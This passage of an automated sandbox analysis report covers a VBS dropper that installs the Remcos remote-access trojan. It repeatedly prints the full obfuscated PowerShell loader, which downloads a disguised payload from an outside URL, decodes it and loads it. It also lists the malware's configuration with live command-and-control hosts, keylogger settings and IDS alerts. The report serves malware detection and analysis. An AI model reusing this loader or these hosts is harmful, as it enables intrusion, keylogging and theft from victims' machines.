= [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt
                        Source: Process started | Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ProcessId: 7272, ProcessName: wscript.exe
                        Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt
                        Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt

                        Data Obfuscation

                        Source: Process started | Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt

                        Stealing of Sensitive Information

                        Source: File created | Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 8048, TargetFilename: C:\ProgramData\remcos\logs.dat
                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2024-12-19T13:19:33.562190+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 5.182.211.158 | 443 | 192.168.2.4 | 49737 | TCP
                        2024-12-19T13:20:07.661170+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 5.182.211.158 | 443 | 192.168.2.4 | 49755 | TCP

                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2024-12-19T13:19:33.562190+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 5.182.211.158 | 443 | 192.168.2.4 | 49737 | TCP
                        2024-12-19T13:20:07.661170+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 5.182.211.158 | 443 | 192.168.2.4 | 49755 | TCP

                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2024-12-19T13:19:36.355636+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:19:44.152578+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:19:45.469486+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:09.876442+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49761 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:11.629417+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49767 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:13.270134+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49773 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:15.010625+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49779 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:17.229063+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49785 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:18.440638+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49786 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:19.651997+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49792 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:20.865957+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49796 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:23.082460+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49803 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:24.290957+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49805 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:25.501522+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49811 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:26.711259+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49812 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:28.928161+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49818 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:30.201122+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49824 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:31.415147+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49825 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:32.625272+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49831 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:34.844715+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49837 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:36.120281+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49841 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:37.330701+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49844 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:38.542269+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49849 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:40.762616+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49856 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:41.971518+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49857 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:43.190408+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49863 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:44.404156+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49864 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:46.647066+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49871 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:47.858375+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49876 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:49.096041+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49880 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:50.315428+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49883 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:20:52.537715+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49889 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:02.774191+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49895 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:03.984842+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49916 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:05.191448+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49922 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:07.414461+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49928 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:08.656167+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49932 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:09.866355+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49935 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:11.082137+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49940 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:13.373486+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49946 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:14.586423+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49948 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:15.803525+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49954 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:17.013748+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49955 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:19.241202+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49961 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:20.453368+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49967 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:21.687017+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49970 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:22.901213+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49974 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:25.118678+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49980 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:26.330477+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49984 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:27.537482+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49987 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:28.748787+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49993 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:30.973972+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49999 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:32.189714+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50000 | 45.80.158.30 | 23101 | TCP
                        2024-12-19T13:21:33.401127+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50006 | 45.80.158.30 | 23101 | TCP

                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2024-12-19T13:19:34.484602+0100 | 2057635 | 1 | A Network Trojan was detected | 5.182.211.158 | 443 | 192.168.2.4 | 49737 | TCP
                        2024-12-19T13:20:08.576424+0100 | 2057635 | 1 | A Network Trojan was detected | 5.182.211.158 | 443 | 192.168.2.4 | 49755 | TCP

                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2024-12-19T13:19:38.921140+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 178.237.33.50 | 80 | TCP

                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2024-12-19T13:19:34.484602+0100 | 2858295 | 1 | A Network Trojan was detected | 5.182.211.158 | 443 | 192.168.2.4 | 49737 | TCP
                        2024-12-19T13:20:08.576424+0100 | 2858295 | 1 | A Network Trojan was detected | 5.182.211.158 | 443 | 192.168.2.4 | 49755 | TCP


                        AV Detection

                        Source: rem.pushswroller.eu | Avira URL Cloud: Label: malware
                        Source: firewarzone.ydns.eu | Avira URL Cloud: Label: malware
                        Source: 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "dim.remofficialws.top:23101:1", "rem.officialswvrem.top:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghdzxtrswtwg-BJ2KPV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                        Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000C.00000002.2262032025.0000000002D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.3171710253.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.3173871595.0000000002B1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6800, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043293A
                        Source: MSBuild.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

                        Exploits

                        Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR

                        Privilege Escalation

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764
                        Source: unknown | HTTPS traffic detected: 5.182.211.158:443 -> 192.168.2.4:49737 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 5.182.211.158:443 -> 192.168.2.4:49755 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

                        Software Vulnerabilities

                        Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49779 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49792 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49773 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49785 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49786 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49761 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49796 -> 45.80.158.30:23101
